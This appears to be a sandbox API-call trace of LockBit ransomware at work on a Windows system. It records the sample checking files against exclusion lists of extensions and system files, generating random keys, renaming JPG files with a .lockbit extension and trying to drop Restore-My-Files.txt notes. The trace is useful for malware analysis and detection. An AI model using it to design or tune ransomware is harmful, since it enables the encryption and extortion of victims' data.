lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.155] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099155.JPG") returned 1 [0121.155] lstrcmpiW (lpString1="ntldr", lpString2="J0099155.JPG") returned 1 [0121.155] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099155.JPG") returned 1 [0121.155] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099155.JPG") returned -1 [0121.155] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099155.JPG") returned -1 [0121.155] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099155.JPG") returned 1 [0121.155] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099155.JPG") returned -1 [0121.155] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.155] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned=".JPG" [0121.156] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.156] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.156] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.157] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.157] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.157] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG.lockbit") returned 72 [0121.157] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0121.157] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.157] malloc (_Size=0x40068) returned 0x1ff1e60 [0121.157] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8826) returned 1 [0121.157] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0121.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0121.158] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0121.162] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.162] malloc (_Size=0xa6) returned 0x77d7a8 [0121.162] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.167] free (_Block=0x77d7a8) [0121.167] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.167] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.167] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.167] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x3682, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099156.JPG", cAlternateFileName="")) returned 1 [0121.167] lstrcmpiW (lpString1=".", lpString2="J0099156.JPG") returned -1 [0121.167] lstrcmpiW (lpString1="..", lpString2="J0099156.JPG") returned -1 [0121.167] PathFindExtensionW (pszPath="J0099156.JPG") returned=".JPG" [0121.167] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.167] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.167] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.167] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.167] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.168] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.168] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.169] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.169] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.169] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.169] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.169] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.169] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.169] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099156.JPG") returned 1 [0121.169] lstrcmpiW (lpString1="ntldr", lpString2="J0099156.JPG") returned 1 [0121.169] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099156.JPG") returned 1 [0121.170] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099156.JPG") returned -1 [0121.170] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099156.JPG") returned -1 [0121.170] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099156.JPG") returned 1 [0121.170] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099156.JPG") returned -1 [0121.170] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.170] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned=".JPG" [0121.170] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.170] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.170] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.170] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.170] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.170] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.170] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.171] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.171] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.171] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.171] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.171] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.171] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.171] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.171] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.171] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.171] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG.lockbit") returned 72 [0121.171] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0121.172] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.172] malloc (_Size=0x40068) returned 0x3e70008 [0121.172] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=13954) returned 1 [0121.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0121.173] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0121.173] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0121.176] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.176] malloc (_Size=0xa6) returned 0x77d7a8 [0121.176] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.176] free (_Block=0x77d7a8) [0121.177] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.177] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.177] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.177] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x25c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099157.JPG", cAlternateFileName="")) returned 1 [0121.177] lstrcmpiW (lpString1=".", lpString2="J0099157.JPG") returned -1 [0121.177] lstrcmpiW (lpString1="..", lpString2="J0099157.JPG") returned -1 [0121.177] PathFindExtensionW (pszPath="J0099157.JPG") returned=".JPG" [0121.177] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.177] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.177] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.177] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.177] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.177] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.177] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.177] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.177] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.177] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.178] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.178] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.178] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.178] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.178] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.178] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.178] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.178] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.178] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.178] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.178] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.178] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.178] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.178] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.178] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.178] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.178] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.179] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.179] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.179] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.179] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.179] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.179] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.179] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.179] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.179] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099157.JPG") returned 1 [0121.180] lstrcmpiW (lpString1="ntldr", lpString2="J0099157.JPG") returned 1 [0121.180] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099157.JPG") returned 1 [0121.180] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099157.JPG") returned -1 [0121.180] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099157.JPG") returned -1 [0121.180] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099157.JPG") returned 1 [0121.180] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099157.JPG") returned -1 [0121.180] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.180] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned=".JPG" [0121.180] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.180] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.180] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.180] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.181] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.181] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0121.181] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0121.181] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG.lockbit") returned 72 [0121.181] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0121.182] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.182] malloc (_Size=0x40068) returned 0x3ef0008 [0121.182] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=9671) returned 1 [0121.182] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0121.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0121.183] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0121.229] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.229] malloc (_Size=0xa6) returned 0x77d7a8 [0121.229] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.261] free (_Block=0x77d7a8) [0121.261] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.261] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.261] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.262] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, 